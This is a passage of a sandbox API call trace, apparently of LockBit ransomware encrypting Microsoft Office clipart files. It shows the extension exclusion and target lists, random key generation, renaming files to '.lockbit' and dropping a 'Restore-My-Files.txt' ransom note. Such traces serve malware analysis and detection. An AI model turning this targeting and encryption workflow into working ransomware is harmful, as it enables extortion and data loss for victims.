[0179.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.712] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.712] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.712] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF.lockbit") returned 72 [0179.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00494_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.713] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.713] malloc (_Size=0x40068) returned 0x3df0008 [0179.713] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6144) returned 1 [0179.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.714] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.716] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.716] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.717] free (_Block=0x1fa2ed8) [0179.717] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.717] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.717] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x70639c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x342e, dwReserved0=0x0, dwReserved1=0x0, cFileName="URBAN_01.MID", cAlternateFileName="")) returned 1 [0179.717] lstrcmpiW (lpString1=".", lpString2="URBAN_01.MID") returned -1 [0179.717] lstrcmpiW (lpString1="..", lpString2="URBAN_01.MID") returned -1 [0179.717] PathFindExtensionW (pszPath="URBAN_01.MID") returned=".MID" [0179.717] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0179.717] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0179.717] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0179.717] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0179.717] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0179.718] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0179.718] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="ntldr", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="bootsect.bak", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="autorun.inf", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="thumbs.db", lpString2="URBAN_01.MID") returned -1 [0179.719] lstrcmpiW (lpString1="iconcache.db", lpString2="URBAN_01.MID") returned -1 [0179.719] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.719] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned=".MID" [0179.719] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0179.719] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0179.719] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0179.720] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0179.720] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0179.720] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.lockbit") returned 72 [0179.720] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.724] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.724] malloc (_Size=0x40068) returned 0x3d70450 [0179.724] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13358) returned 1 [0179.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.724] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0179.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0179.725] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.727] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.727] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.728] free (_Block=0x1fa2ed8) [0179.728] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.728] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.728] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1361, dwReserved0=0x0, dwReserved1=0x0, cFileName="VCTRN_01.MID", cAlternateFileName="")) returned 1 [0179.728] lstrcmpiW (lpString1=".", lpString2="VCTRN_01.MID") returned -1 [0179.728] lstrcmpiW (lpString1="..", lpString2="VCTRN_01.MID") returned -1 [0179.728] PathFindExtensionW (pszPath="VCTRN_01.MID") returned=".MID" [0179.728] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0179.728] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0179.728] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0179.728] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0179.728] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0179.728] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0179.728] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0179.728] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0179.728] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0179.729] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0179.729] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="ntldr", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="bootsect.bak", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="autorun.inf", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="thumbs.db", lpString2="VCTRN_01.MID") returned -1 [0179.730] lstrcmpiW (lpString1="iconcache.db", lpString2="VCTRN_01.MID") returned -1 [0179.730] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.730] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned=".MID" [0179.730] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0179.730] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0179.730] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0179.731] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0179.731] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0179.731] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.lockbit") returned 72 [0179.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.735] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.735] malloc (_Size=0x40068) returned 0x3df0008 [0179.735] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4961) returned 1 [0179.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.736] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.738] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.738] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.738] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.740] free (_Block=0x1fa2ed8) [0179.740] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.740] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.740] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce1f900, ftCreationTime.dwHighDateTime=0x1bd4e55, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce1f900, ftLastWriteTime.dwHighDateTime=0x1bd4e55, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01219_.GIF", cAlternateFileName="")) returned 1 [0179.740] lstrcmpiW (lpString1=".", lpString2="WB01219_.GIF") returned -1 [0179.740] lstrcmpiW (lpString1="..", lpString2="WB01219_.GIF") returned -1 [0179.740] PathFindExtensionW (pszPath="WB01219_.GIF") returned=".GIF" [0179.740] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.740] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.740] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.741] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.741] lstrcmpiW 